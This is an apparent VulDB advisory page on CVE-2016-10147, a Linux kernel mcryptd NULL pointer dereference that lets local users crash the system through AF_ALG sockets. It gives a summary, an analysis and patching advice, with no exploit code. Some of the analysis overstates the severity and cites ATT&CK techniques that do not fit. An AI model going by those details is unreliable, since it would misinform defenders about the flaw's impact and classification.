CVE-2016-10147 in Linux
Summary
by MITRE
crypto/mcryptd.c in the Linux kernel before 4.8.15 allows local users to cause a denial of service (NULL pointer dereference and system crash) by using an AF_ALG socket with an incompatible algorithm, as demonstrated by mcryptd(md5).
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 05/13/2026
The vulnerability described in CVE-2016-10147 represents a critical NULL pointer dereference issue within the Linux kernel's cryptographic subsystem, specifically affecting the mcryptd module that handles algorithmic encryption operations. This flaw exists in kernel versions prior to 4.8.15 and manifests when local users exploit AF_ALG socket functionality with incompatible cryptographic algorithms. The attack vector involves the manipulation of algorithm parameters through the mcryptd module, which processes cryptographic operations for the kernel's crypto API framework. The vulnerability is particularly concerning because it can be triggered by any local user with access to the system, making it an attractive target for privilege escalation attempts or system disruption attacks.
The technical root cause of this vulnerability lies in the improper validation of algorithm parameters within the crypto/mcryptd.c file, where the kernel fails to adequately check the compatibility of cryptographic algorithms before attempting to process them through the AF_ALG socket interface. When an incompatible algorithm such as md5 is presented to the mcryptd module, the kernel's processing logic encounters a NULL pointer dereference condition that results in immediate system crash or panic. This occurs because the module attempts to access memory locations that have not been properly initialized or allocated, leading to a kernel oops condition that terminates the system's ability to function properly. The flaw demonstrates a classic lack of input validation and error handling that is commonly associated with CWE-476 Null Pointer Dereference, where the code assumes pointer values will never be NULL without proper checks.
The operational impact of this vulnerability extends beyond simple denial of service, as it can be leveraged to compromise system availability and stability in ways that may not be immediately apparent to administrators. Local attackers can reliably trigger system crashes by simply creating an AF_ALG socket and attempting to use incompatible algorithms, making this a persistent threat that can be exploited repeatedly without requiring elevated privileges. The vulnerability affects systems running kernel versions earlier than 4.8.15 and impacts any environment where the mcryptd module is active, which is common in many enterprise and server deployments. From an attacker's perspective, this represents a low-effort, high-impact method of causing system instability that could be combined with other techniques to create more sophisticated attack vectors, potentially aligning with ATT&CK technique T1499.004 for Network Denial of Service or T1059.001 for Command and Scripting Interpreter usage patterns.
Mitigation strategies for CVE-2016-10147 focus primarily on kernel version updates and system hardening measures that address the root cause of the vulnerability. The most effective solution is to upgrade to Linux kernel version 4.8.15 or later, where the mcryptd module properly validates algorithm compatibility before processing requests through AF_ALG sockets. System administrators should also implement monitoring for unusual AF_ALG socket usage patterns and consider disabling unnecessary cryptographic modules when they are not required for system operations. Additional protective measures include restricting local user access to cryptographic operations where possible and implementing proper kernel lockdown mechanisms that prevent unauthorized modification of kernel modules. The vulnerability demonstrates the importance of proper error handling and input validation in kernel space code, emphasizing that security controls must be robust enough to handle malformed inputs without causing system-wide failures. Organizations should also consider implementing automated patch management systems to ensure timely deployment of kernel security updates and maintain comprehensive system monitoring to detect potential exploitation attempts.